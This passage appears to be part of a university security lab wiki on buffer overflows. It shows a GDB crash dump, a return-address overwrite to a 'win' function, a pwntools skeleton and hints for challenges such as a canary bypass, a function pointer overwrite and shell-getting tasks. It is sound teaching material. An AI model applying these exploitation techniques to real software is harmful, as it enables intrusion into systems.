 +0008| 0xffffd628 --> 0xffffd6bc --> 0xffffd8cb ("XDG_CONFIG_DIRS=/etc/xdg/xdg-ubuntu:/etc/xdg")
 +0012| 0xffffd62c --> 0xffffd644 --> 0x0 
 +0016| 0xffffd630 --> 0x1 
 +0020| 0xffffd634 --> 0x0 
 +0024| 0xffffd638 --> 0xf7fb4000 --> 0x1d4d6c 
 +0028| 0xffffd63c --> 0xf7fe575a (add    edi,0x178a6)
 +[------------------------------------------------------------------------------]
 +Legend: code, data, rodata, value
 +Stopped reason: SIGSEGV
 +0xdeadbeef in ?? ()
 +</code>
 +
 +Excellent. Now we can replace ''0xdeadbeef'' with the address of the ''win'' function.
 +
 +<code python>
 +...
 +payload += struct.pack('<I', 0x080484b6)
 +...
 +</code>
 +
 +<code>
 +$ cat payload | ./buffer_overflow_ret 
 +Please leave a message: Nothing to see here
 +Well done!
 +Segmentation fault (core dumped)
 +</code>
 +
 +Our job here is done. Now it's time for you to smash some stacks.
 +
 +<note tip>
 +Keep in mind that buffer overflows are not the only type of vulnerability, but they are very common.
 +</note>
 +
 +===== Challenges =====
 +
 +<note important>
 +Before venturing forth, consider the following roadmap when approaching a challenge:
 +  * disassemble the binary
 +  * identify the stack buffer
 +  * identify functions which work with buffers
 +  * see if there are any mismatches (declared size vs. index used)
 +  * dynamic analysis in GDB; inject De Bruijn patterns whenever input is read
 +  * determine offset in buffer
 +  * write a script which generates a payload to reliably crash/exploit the target
 +  * keep stdin/connection open for further interaction after obtaining a shell
 +  * ???
 +  * PROFIT
 +
 +</note>
 +
 +Use the following [[http://security.cs.pub.ro/summer-school/res/arc/06-buffer-management-skel.zip|archive]].
 +
 +==== 01. Parrot ====
 +
 +Some programs feature a "stack smashing protection" in the form of stack canaries, that is, values kept on the stack which are checked before returning from a function. If the value has changed, then the "canary" can conclude that stack data has been corrupted throughout the execution of the current function.
 +
 +We have implemented our very own ''parrot''. Can you avoid it somehow?
 +
 +<note tip>
 +Values are little endian. So if you want to send ''0xabcd'' you would send it as ''\xcd\xab\x00\x00''.
 +</note>
 +
 +<note tip>
 +When providing input to a program and wanting to maintain connection to its standard input, run:
 +<code>
 +cat payload - | ./program
 +</code>
 +
 +Or, if you have a payload generator program such as ''payload.py'', run:
 +<code>
 +cat <(python payload.py) - | ./program
 +</code>
 +</note>
 +
 +==== 02. Indexing ====
 +
 +More complex programs require some form of protocol or user interaction. This is where the great [[https://github.com/Gallopsled/pwntools|pwntools]] come in.
 +
 +Here's an interactive script to get you started:
 +
 +<code python exploit.py>
 +#!/usr/bin/env python
 +from pwn import *
 +
 +p = process('./indexing')
 +
 +p.recvuntil('Index: ')
 +p.sendline() # TODO (must be string)
 +
 +# Give value
 +p.recvuntil('Value: ')
 +p.sendline() # TODO (must be string)
 +p.interactive()
 +</code>
 +
 +<note tip>
 +Go through GDB when aiming to solve this challenge. As all input values are strings, you can input them at the keyboard and follow their effect in GDB.
 +</note>
 +
 +<note tip>
 +You can inspect the behavior of a program for a given input by doing:
 +<code>
 +cat payload | strace ./program
 +</code>
 +That is, you will trace the program being exploited and see ''read()'' or other calls and how they fare for a given input.
 +</note>
 +==== 03. Smashthestack Level7 ====
 +
 +Now you can tackle a real challenge. See if you can figure out how you can get a shell from this one.
 +
 +<note tip>
 +There's an integer overflow + buffer overflow in the program.
 +</note>
 +
 +<note tip>
 +What are the four 32 bit values that multiplied by ''4'' give you, let's say, ''256''?
 +</note>
 +
 +<note tip>
 +In order to run a program that receives command line arguments under gdb, you can do the following:
 +
 +<code gdb>
 +$ gdb ./main
 +gdb$ set args arg1 arg2 arg3
 +gdb$ start
 +</code> 
 +</note>
 +==== 04. Neighbourly ====
 +
 +Let's overwrite a structure's function pointer using a buffer overflow in its vicinity. The principle is the same.
 +
 +<note tip>
 +The ''ptext'' field of the structure is a function pointer. Overwrite it with the address of the ''win()'' function.
 +</note>
 +
 +==== 05. Uninitialized ====
 +
 +There's something faulty in the program, and it's **not** an buffer overflow. Provide the proper input to the executable and get a shell.
 +
 +<note tip>
 +Do **not** use pwntools for this task.
 +</note>
 +==== 06: Bonus: Uninitialized 2 ====
 +
 +There's a small update to the ''uninitialized'' executable and you need to update your solution.
 +
 +<note tip>
 +Use ''ltrace'' to understand what's happening differently.
 +</note>
 +
 +<note important>
 +Create a pwntools-based script to solve both the initial executable and the bonus one.
 +</note>
 +
 +==== 05. Bonus: Birds ====
 +
 +Time for a more complex challenge. Be patient and don't speed through it.